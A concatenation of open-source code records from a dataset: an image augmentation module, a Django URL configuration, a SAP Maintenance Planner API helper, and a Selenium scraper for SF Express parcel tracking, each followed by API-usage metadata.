Default eigen vals and vecs are taken from:\n https://github.com/facebook/fb.resnet.torch/blob/master/datasets/imagenet.lua and they represent values\n calculated for a subset of ImageNet assuming BGR format.\n \"\"\"\n super(PCAColorAugmenter, self).__init__()\n self.params = [ratio]\n self.params_random = [RandomNormal(0, max(ratio))]\n self.name = 'pc'\n\n self.eigen_vecs = eigen_vecs\n if eigen_vecs is None:\n self.eigen_vecs = np.array(\n [[ 0.4203, -0.6948, -0.5836],\n [-0.8140, -0.0045, -0.5808],\n [ 0.4009, 0.7192, -0.5675]]\n )\n\n self.eigen_vals = eigen_vals\n if eigen_vals is None:\n self.eigen_vals = np.array(\n [0.0045, 0.0188, 0.2175]\n )\n\n def transform(self, img, ratio):\n\n if ratio == 0 or helper.is_mask(img):\n return img\n\n update = np.dot(self.eigen_vecs, np.expand_dims(np.multiply(self.eigen_vals, ratio), axis=1))\n update = np.int8(update.flatten() * 255)\n val = tuple(update.tolist()) + (0,)\n return cv.add(img, val)\n\n\nclass CropAugmenter(Augmenter):\n\n def __init__(self, scales=(0.5, 0.8, 1.0), x=(.0, 1.0), y=(.0, 1.0), rectangular=False):\n super(CropAugmenter, self).__init__()\n self.rectangular = rectangular\n self.name = 'cr'\n self.params = [scales, x, y]\n self.params_random = [RandomElement(scales),\n RandomFromRange(min(x), max(x)),\n RandomFromRange(min(y), max(y))]\n\n def transform(self, img, scale, x, y):\n crop_width = int(img.shape[1] * scale)\n crop_height = int(img.shape[0] * scale)\n if self.rectangular:\n crop_width = crop_height = min(crop_width, crop_height)\n crop_x = int((img.shape[1] - crop_width) * x)\n crop_y = int((img.shape[0] - crop_height) * y)\n crop = img[crop_y:crop_y + crop_height, crop_x:crop_x + crop_width].copy()\n return crop\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# MultiAugmenter\n# ----------------------------------------------------------------------------------------------------------------------\n\nclass MultiAugmenter(object):\n\n def __init__(self, augmenters):\n self.augmenters = augmenters\n\n def augment_fixed(self, *images):\n return self.augment(images, 'augment_fixed')\n\n def augment_random(self, *images):\n res = self.augment(images, 'augment_random')\n return res[0][0], res[0][1]\n\n def augment(self, image, method):\n result = []\n for augmenter in self.augmenters:\n augmented = []\n input_ = result\n if not input_:\n input_ = [(image, '')]\n for img, name in input_:\n res = getattr(augmenter, method)(*img)\n for nimg, nname in [res]:\n augmented.append((nimg, name + (\"_\" if name else \"\") + nname))\n result = augmented\n\n if not self.augmenters:\n result.append((image, \"\"))\n\n return result\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Random params\n# ----------------------------------------------------------------------------------------------------------------------\n\nclass RandomElement(object):\n\n def __init__(self, elements):\n self.elements = elements\n\n def get(self):\n return random.choice(self.elements)\n\n\nclass RandomFromRange(object):\n\n def __init__(self, a, b, step=1):\n self.a = a\n self.b = b\n self.step = step\n if step != 1:\n elements = self.valid_elements()\n self.random_element = RandomElement(elements)\n self.get = self.random_element.get\n\n def get(self):\n if isinstance(self.a, int):\n return random.randint(self.a, self.b)\n else:\n return random.uniform(self.a, self.b)\n\n def 
valid_elements(self):\n elements = []\n value = self.a\n while value <= self.b:\n elements.append(value)\n value += self.step\n return elements\n\n\nclass RandomNormal(object):\n\n def __init__(self, mean, sigma):\n self.mean = mean\n self.sigma = sigma\n\n def get(self):\n return random.normalvariate(self.mean, self.sigma)\n\n\nclass RandomNormalFromRange(RandomFromRange):\n\n def __init__(self, a, b, step=1):\n super(RandomNormalFromRange, self).__init__(a, b, step)\n self.a = a\n self.b = b\n self.step = step\n # 3 sigma (covers 99.7% of samples)\n self.sigma = abs(b - a) / 3.0\n\n def get(self):\n val = random.normalvariate(self.a, self.sigma)\n if val < self.a:\n val = 2 * self.a - val\n if isinstance(self.a, int):\n val = int(val)\n if self.step != 1:\n elements = self.valid_elements()\n idx = np.abs(np.array(elements)-val).argmin()\n val = elements[idx]\n return val\n\n\ndef get_by_name(name):\n d = {\n \"copy\": CopyAugmenter,\n \"rotate\": RotateAugmenter,\n \"rotateangle\": RotateAngleAugmenter,\n \"flip\": FlipAugmenter,\n \"huedistortion\": HueDistortionAugmenter,\n \"saturationdistortion\": SaturationDistortionAugmenter,\n \"brightness\": BrightnessAugmenter,\n \"blur\": BlurAugmenter,\n \"noise\": NoiseAugmenter,\n \"perspective\": PerspectiveAugmenter,\n \"skew\": SkewAugmenter,\n \"circle\": CircleAugmenter,\n \"pcacolor\": PCAColorAugmenter,\n \"crop\": CropAugmenter,\n }\n return d[name.lower()]\n", "repo_name": "ambrzeski/aug", "sub_path": "augmenters.py", "file_name": "augmenters.py", "file_ext": "py", "file_size_in_byte": 15774, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "aug.helper.to_string", "line_number": 26, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 26, "usage_type": "name"}, {"api_name": "itertools.product", "line_number": 34, "usage_type": "call"}, {"api_name": "aug.helper.to_string", "line_number": 36, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 36, "usage_type": "name"}, {"api_name": "cv2.transpose", "line_number": 79, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.transpose", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 117, "usage_type": "call"}, {"api_name": "aug.helper.is_mask", "line_number": 132, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 132, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 135, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 139, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 145, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2BGR", "line_number": 146, "usage_type": "attribute"}, {"api_name": "aug.helper.is_mask", "line_number": 161, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 161, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 164, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", 
"line_number": 164, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 165, "usage_type": "call"}, {"api_name": "cv2.add", "line_number": 167, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 170, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 171, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2BGR", "line_number": 171, "usage_type": "attribute"}, {"api_name": "aug.helper.is_mask", "line_number": 186, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 186, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 191, "usage_type": "call"}, {"api_name": "aug.helper.is_mask", "line_number": 206, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 206, "usage_type": "name"}, {"api_name": "cv2.GaussianBlur", "line_number": 209, "usage_type": "call"}, {"api_name": "aug.helper.is_mask", "line_number": 224, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 224, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 229, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 265, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 267, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 300, "usage_type": "call"}, {"api_name": "cv2.getAffineTransform", "line_number": 302, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 303, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 348, "usage_type": "call"}, {"api_name": "aug.helper.is_mask", "line_number": 354, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 354, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 358, "usage_type": "call"}, {"api_name": "cv2.add", "line_number": 360, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 430, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 446, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 448, "usage_type": "call"}, {"api_name": "random.normalvariate", "line_number": 466, "usage_type": "call"}, {"api_name": "random.normalvariate", 
"line_number": 480, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 487, "usage_type": "call"}]}
+{"seq_id": "69984855767", "text": "from django.urls import include, path\nfrom rest_framework_simplejwt.views import (TokenObtainPairView,\n TokenRefreshView)\n\nurlpatterns = [\n path('users/', include('clients.urls')),\n path('currencies', include('currency.urls')),\n path('transactions', include('transactions.urls')),\n path('accounts', include('accounts.urls')),\n path('silk/', include('silk.urls', namespace='silk')),\n path(\n 'auth/token/',\n TokenObtainPairView.as_view(),\n name='token_obtain_pair'\n ),\n path(\n 'auth/refresh/',\n TokenRefreshView.as_view(),\n name='token_refresh'\n ),\n]\n", "repo_name": "Boring-Mind/bank-transactions", "sub_path": "bank/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 661, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "22720499164", "text": "#!/user/bin/env python3\n# coding: utf-8\n\nimport os\nimport pathlib\nimport re\nimport time\nfrom html import unescape\nfrom urllib.parse import urljoin\n\nfrom bs4 import BeautifulSoup\nfrom lxml import etree\nfrom requests.auth import HTTPBasicAuth\nfrom requests.sessions import session\n\nfrom . import constants as C\nfrom .sap_api_common import _request, https_session\nfrom .sap_id_sso import _get_sso_endpoint_meta, sap_sso_login\n\n_MP_XSRF_TOKEN = None\n_MP_TRANSACTIONS = None\n\n\ndef auth_maintenance_planner():\n # Clear mp relevant cookies for avoiding unexpected responses.\n _clear_mp_cookies('maintenanceplanner')\n res = _request(C.URL_MAINTAINANCE_PLANNER)\n sig_re = re.compile('signature=(.*?);path=\\/\";location=\"(.*)\"')\n signature, redirect = re.search(sig_re, res.text).groups()\n\n # Essential cookies for the final callback\n mp_cookies = {\n 'signature': signature,\n 'fragmentAfterLogin': '',\n 'locationAfterLogin': '%2F'\n }\n\n MP_DOMAIN = C.URL_MAINTAINANCE_PLANNER.replace('https://', '')\n for k, v in mp_cookies.items():\n https_session.cookies.set(k, v, domain=MP_DOMAIN, path='/')\n\n res = _request(redirect)\n meta_re = re.compile(' ')\n raw_redirect = re.search(meta_re, res.text).group(1)\n\n endpoint = urljoin(res.url, unescape(raw_redirect))\n meta = {}\n while 'SAMLResponse' not in meta:\n endpoint, meta = _get_sso_endpoint_meta(endpoint, data=meta)\n _request(endpoint, data=meta)\n\n\ndef auth_userapps():\n \"\"\"Auth against userapps.support.sap.com\n \"\"\"\n _clear_mp_cookies('userapps')\n endpoint, meta = _get_sso_endpoint_meta(C.URL_USERAPPS)\n\n while endpoint != C.URL_USERAPPS:\n endpoint, meta = _get_sso_endpoint_meta(endpoint, data=meta)\n _request(endpoint, data=meta)\n\n # Reset Cache\n global _MP_XSRF_TOKEN\n global _MP_TRANSACTIONS\n _MP_XSRF_TOKEN = None\n _MP_TRANSACTIONS = None\n\n\ndef get_mp_user_details():\n url = urljoin(C.URL_MAINTAINANCE_PLANNER,\n '/MCP/MPHomePageController/getUserDetailsDisplay')\n params = {'_': int(time.time() * 1000)}\n user = _request(url, params=params).json()\n return user\n\n\ndef get_transactions():\n global _MP_TRANSACTIONS\n if _MP_TRANSACTIONS is not None:\n return _MP_TRANSACTIONS\n res = _mp_request(params={'action': 'getTransactions'})\n xml = unescape(res.text.replace('\\ufeff', ''))\n doc = BeautifulSoup(xml, features='lxml')\n _MP_TRANSACTIONS = [t.attrs for t in doc.find_all('mnp:transaction')]\n return _MP_TRANSACTIONS\n\n\ndef get_transaction_details(trans_id):\n params = {\n 'action': 'getMaintCycle',\n 'sub_action': 'load',\n 'call_from': 'transactions',\n 'session_id': trans_id\n }\n res = _mp_request(params=params)\n xml = unescape(res.text.replace('\\ufeff', ''))\n return xml\n\n\ndef get_transaction_stack_xml(trans_id, output_dir=None):\n params = {\n 'action': 'downloadFiles',\n 'sub_action': 'stack-plan',\n 'session_id': trans_id,\n }\n\n # Returns XML file with XML Element values using appropriate special character predefined entities (e.g. 
&amp; instead of &)\n    res = _mp_request(params=params)\n\n    if output_dir is None:\n        return res.text\n\n    dest = pathlib.Path(output_dir)\n    # content-disposition: attachment; filename=MP_XX_STACK.xml\n    _, name = res.headers.get('content-disposition').split('filename=')\n    dest = dest.joinpath(name)\n\n    with open(dest, 'w') as f:\n        f.write(res.text)\n\n\ndef get_stack_files_xml(trans_id):\n    trans_name = _get_transaction_name(trans_id)\n    request_xml = _build_mnp_xml(action='getStackFiles',\n                                 call_for='download_stack_xml',\n                                 sessionid=trans_id,\n                                 trans_name=trans_name)\n\n    res = _mp_request(data=request_xml)\n    xml = unescape(res.text.replace('\\ufeff', ''))\n    return xml\n\n\ndef get_download_files_xml(trans_id):\n    trans_name = _get_transaction_name(trans_id)\n    request_xml = _build_mnp_xml(action='postProcessStack',\n                                 call_for='download_stack_xml',\n                                 sessionid=trans_id,\n                                 trans_name=trans_name)\n    res = _mp_request(data=request_xml)\n    xml = unescape(res.text.replace('\\ufeff', ''))\n    return xml\n\n\ndef get_download_basket_files(trans_id):\n    params = {\n        'action': 'getDownloadBasketFiles',\n        'session_id': trans_id,\n    }\n    res = _mp_request(params=params)\n    xml = unescape(res.text.replace('\\ufeff', ''))\n    return xml\n\n\ndef add_stack_download_files_to_basket(trans_id):\n    '''\n    POST data format: an <mnp:request> XML payload (the inline example lost its tags in this copy)\n\n    \n    \n    \n    \n    \n    \n    \n    \n    '''\n    params = {\n        'action': 'push2Db',\n        'session_id': trans_id,\n    }\n    xml = get_download_files_xml(trans_id)\n    doc = etree.fromstring(xml.encode('utf-16'))\n    stack_files = doc.xpath(\n        '//mnp:entity[@id=\"stack_files\"]',\n        namespaces={'mnp': 'http://xml.sap.com/2012/01/mnp'})\n    if not stack_files:\n        raise ValueError('stack files not found')\n\n    request_xml = _build_mnp_xml(action='push2Db',\n                                 call_for='download_stack_xml',\n                                 sessionid=trans_id,\n                                 entities=stack_files[0])\n    res = _mp_request(params=params, data=request_xml)\n    xml = unescape(res.text.replace('\\ufeff', ''))\n    return xml\n\n\ndef get_download_basket_url_filename():\n    download_items = get_download_basket_json()\n    return [(i['DirectDownloadUrl'], i['ObjectName']) for i in download_items]\n\n\ndef get_download_basket_json():\n    url = C.URL_SOFTWARE_CENTER_SERVICE + '/DownloadBasketItemSet'\n    headers = {'Accept': 'application/json'}\n    j = _request(url, headers=headers).json()\n\n    results = j['d']['results']\n    for r in results:\n        r.pop('__metadata', None)\n    return results\n\n\ndef get_transaction_id_by_name(name):\n    transaction = _get_transaction('trans_name', name)\n    return transaction['trans_id']\n\n\ndef get_transaction_id_by_display_id(display_id):\n    transaction = _get_transaction('trans_display_id', display_id)\n    return transaction['trans_id']\n\ndef get_transaction_filename_url(trans_id):\n    xml = get_download_files_xml(trans_id)\n    e = etree.fromstring(xml.encode('utf-16'))\n    stack_files = e.xpath(\n        '//mnp:entity[@id=\"stack_files\"]/mnp:entity',\n        namespaces={'mnp': 'http://xml.sap.com/2012/01/mnp'})\n    files = []\n    for f in stack_files:\n        file_id = C.URL_SOFTWARE_DOWNLOAD + '/file/' + f.get('id')\n        file_name = f.get('label')\n        files.append((file_id, file_name))\n    return files\n\ndef fetch_download_files(display_id):\n    params = {\n        'action': 'fetchFile',\n        'sub_action': 'download_xml',\n        'display_id': display_id,\n    }\n\n    res = _mp_request(params=params)\n    xml = unescape(res.text.replace('\\ufeff', ''))\n    e = etree.fromstring(xml.encode('utf-8'))\n    files = e.xpath('./download/files/file')\n    url_filename_list = [(f.find('url').text, f.find('name').text)\n                         for f in files]\n\n    return url_filename_list\n\n\ndef 
clear_download_basket():\n download_items = get_download_basket_json()\n for item in download_items:\n object_id = item['ObjectKey']\n delete_item_in_download_basket(object_id)\n\n\ndef delete_item_in_download_basket(object_id):\n url = C.URL_SOFTWARE_CENTER_SERVICE + '/DownloadContentSet'\n params = {\n '_MODE': 'OBJDEL',\n 'OBJID': object_id,\n }\n\n _request(url, params=params)\n\n\n# Getting software download links and filenames via Legacy API,\n# which required SID username and password for Basic Authentication.\n# Usually we should use `fetch_download_files` instead.\ndef fetch_download_files_via_legacy_api(username, password, display_id):\n params = {\n 'action': 'fetchFile',\n 'sub_action': 'download_xml',\n 'display_id': display_id,\n }\n\n res = _request(C.URL_LEGACY_MP_API,\n params=params,\n auth=HTTPBasicAuth(username, password))\n xml = unescape(res.text.replace('\\ufeff', ''))\n e = etree.fromstring(xml.encode('utf-8'))\n files = e.xpath('./download/files/file')\n url_filename_list = [(f.find('url').text, f.find('name').text)\n for f in files]\n\n return url_filename_list\n\n\ndef _get_transaction_name(trans_id):\n transaction = _get_transaction('trans_id', trans_id)\n return transaction['trans_name']\n\n\ndef _get_transaction(key, value):\n transactions = get_transactions()\n trans = [t for t in transactions if t[key] == value]\n if not trans:\n raise KeyError(f'{key}: {value} not found in transactions')\n return trans[0]\n\n\ndef _mp_request(**kwargs):\n params = {\n '_': int(time.time() * 1000),\n }\n if 'params' in kwargs:\n params.update(kwargs['params'])\n kwargs.pop('params')\n\n if params.get('action') != 'getInitialData':\n kwargs['headers'] = {'xsrf-token': _xsrf_token()}\n\n kwargs['allow_redirects'] = False\n\n res = _request(C.URL_USERAPP_MP_SERVICE, params=params, **kwargs)\n if (res.status_code == 302\n and res.headers.get('location').startswith(C.URL_ACCOUNT)):\n if not _is_sso_session_active():\n raise Exception('Not logged in or session expired.'\n ' Please login with `sap_sso_login`')\n auth_userapps()\n res = _request(C.URL_USERAPP_MP_SERVICE, params=params, **kwargs)\n\n return res\n\n\ndef _build_mnp_xml(**params):\n namespace = 'http://xml.sap.com/2012/01/mnp'\n mnp = f'{{{namespace}}}'\n\n request_keys = ['action', 'trans_name', 'sub_action', 'navigation']\n request_attrs = {k: params.get(k, '') for k in request_keys}\n\n entity_keys = ['call_for', 'sessionid']\n entity_attrs = {k: params.get(k, '') for k in entity_keys}\n\n request = etree.Element(f'{mnp}request',\n nsmap={\"mnp\": namespace},\n attrib=request_attrs)\n entity = etree.SubElement(request, f'{mnp}entity', attrib=entity_attrs)\n entity.text = ''\n\n if 'entities' in params and type(params['entities']) is etree._Element:\n entity.append(params['entities'])\n\n xml_str = etree.tostring(request, pretty_print=True)\n return xml_str\n\n\ndef _xsrf_token():\n global _MP_XSRF_TOKEN\n if _MP_XSRF_TOKEN:\n return _MP_XSRF_TOKEN\n\n res = _mp_request(params={'action': 'getInitialData'})\n\n _MP_XSRF_TOKEN = res.headers.get('xsrf-token')\n return _MP_XSRF_TOKEN\n\n\ndef _clear_mp_cookies(startswith):\n for domain in https_session.cookies.list_domains():\n if domain.startswith(startswith):\n https_session.cookies.clear(domain=domain)\n\n\ndef _is_sso_session_active():\n try:\n # Account information\n _request(C.URL_ACCOUNT_ATTRIBUTES).json()\n except Exception as e:\n return False\n\n return True\n", "repo_name": "sap-linuxlab/community.sap_launchpad", "sub_path": 
"plugins/module_utils/sap_launchpad_maintenance_planner_runner.py", "file_name": "sap_launchpad_maintenance_planner_runner.py", "file_ext": "py", "file_size_in_byte": 11561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sap_api_common._request", "line_number": 27, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "re.search", "line_number": 29, "usage_type": "call"}, {"api_name": "sap_api_common.https_session.cookies.set", "line_number": 40, "usage_type": "call"}, {"api_name": "sap_api_common.https_session.cookies", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sap_api_common.https_session", "line_number": 40, "usage_type": "name"}, {"api_name": "sap_api_common._request", "line_number": 42, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.search", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 46, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 46, "usage_type": "call"}, {"api_name": "sap_id_sso._get_sso_endpoint_meta", "line_number": 49, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 50, "usage_type": "call"}, {"api_name": "sap_id_sso._get_sso_endpoint_meta", "line_number": 57, "usage_type": "call"}, {"api_name": "sap_id_sso._get_sso_endpoint_meta", "line_number": 60, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 61, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 71, "usage_type": "call"}, {"api_name": "time.time", "line_number": 73, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 74, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 83, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 84, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 97, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 114, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 131, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 142, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 152, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 174, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 174, "usage_type": "name"}, {"api_name": "html.unescape", "line_number": 186, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 198, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 217, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 217, "usage_type": "name"}, {"api_name": "html.unescape", "line_number": 236, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 237, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 237, "usage_type": "name"}, {"api_name": "sap_api_common._request", "line_number": 259, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 272, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 274, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 275, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 276, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 276, "usage_type": "name"}, {"api_name": "time.time", "line_number": 299, 
"usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 310, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 317, "usage_type": "call"}, {"api_name": "lxml.etree.Element", "line_number": 332, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 332, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 335, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 335, "usage_type": "name"}, {"api_name": "lxml.etree._Element", "line_number": 338, "usage_type": "attribute"}, {"api_name": "lxml.etree", "line_number": 338, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 341, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 341, "usage_type": "name"}, {"api_name": "sap_api_common.https_session.cookies.list_domains", "line_number": 357, "usage_type": "call"}, {"api_name": "sap_api_common.https_session.cookies", "line_number": 357, "usage_type": "attribute"}, {"api_name": "sap_api_common.https_session", "line_number": 357, "usage_type": "name"}, {"api_name": "sap_api_common.https_session.cookies.clear", "line_number": 359, "usage_type": "call"}, {"api_name": "sap_api_common.https_session.cookies", "line_number": 359, "usage_type": "attribute"}, {"api_name": "sap_api_common.https_session", "line_number": 359, "usage_type": "name"}, {"api_name": "sap_api_common._request", "line_number": 365, "usage_type": "call"}]}
+{"seq_id": "22047657622", "text": "from selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\nimport time\n\n\n\ndriver = webdriver.Chrome(executable_path=\"D:\\DEV\\chromedriver.exe\")\n# driver.get(\"https://www.sf-express.com/cn/sc/dynamic_function/waybill/#search/bill-number/291305897906\")\ndriver.get(\"https://www.sf-express.com/cn/sc/dynamic_function/waybill/#search/bill-number/SF1071817875791,SF1071817875904,SF1071817875861,SF1071817875959,288218304352,SF1071817875898,SF1071817875782,288218304264,SF1071817875870,SF1071817875825,SF1071817876025,SF1071817876016,SF1071817876034,SF1071817876122,SF1071817876061,SF1071817876140,SF1071817876104,SF1071817876186,SF1071817876201,288313684364\")\n\n\ntry:\n\n deliveries = WebDriverWait(driver, 15).until(\n EC.presence_of_all_elements_located((By.XPATH, \"//div[@class='delivery-wrapper']/div[@class='delivery']\"))\n )\n\n # open_map_checkbox = WebDriverWait(driver, 3).until(\n # EC.presence_of_element_located((By.XPATH, \"//div[@class='fr openMapModel']/input\"))\n # )\n # open_map_checkbox.click()\n driver.find_element_by_xpath(\"//div[@class='fr openMapModel']/input\").click()\n\n for index, delivery in enumerate(deliveries):\n\n bill_num = delivery.find_element_by_xpath(\".//div[@class='bill-num']/span[@class='number']\").text\n print(\"===================={}、{}==================\".format(index + 1, bill_num))\n print(bill_num)\n\n text = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[1]/li[1]/span\").text\n time = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[1]/li[@class='route-date-time']/span\").text \n print({\"text\": text, \"time\": time})\n\n text = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[last()]/li[1]/span\").text\n time = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[last()]/li[@class='route-date-time']/span\").text \n print({\"text\": text, \"time\": time})\n print(\"打印完毕\")\n\nexcept TimeoutException as e:\n print(\"等待超时\")\n\nfinally:\n print(\"准备退出\")\n driver.quit()\n\n# time.sleep(10)\n\n# deliveries = driver.find_elements_by_xpath(\"//div[@class='delivery-wrapper']/div[@class='delivery']\")\n\n# for index, delivery in enumerate(deliveries):\n\n# bill_num = delivery.find_element_by_xpath(\".//div[@class='bill-num']/span[@class='number']\").text\n# print(\"===================={}、{}==================\".format(index + 1, bill_num))\n# print(bill_num)\n\n# text = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[1]/li[1]/span\").text\n# time = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[1]/li[@class='route-date-time']/span\").text \n# print({\"text\": text, \"time\": time})\n\n# text = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[last()]/li[1]/span\").text\n# time = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[last()]/li[@class='route-date-time']/span\").text \n# print({\"text\": text, \"time\": time})\n\n\n ", "repo_name": "incliff/scraping_shunfeng_order", "sub_path": "tmp/cut_text.py", "file_name": "cut_text.py", "file_ext": "py", "file_size_in_byte": 3229, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 12, 
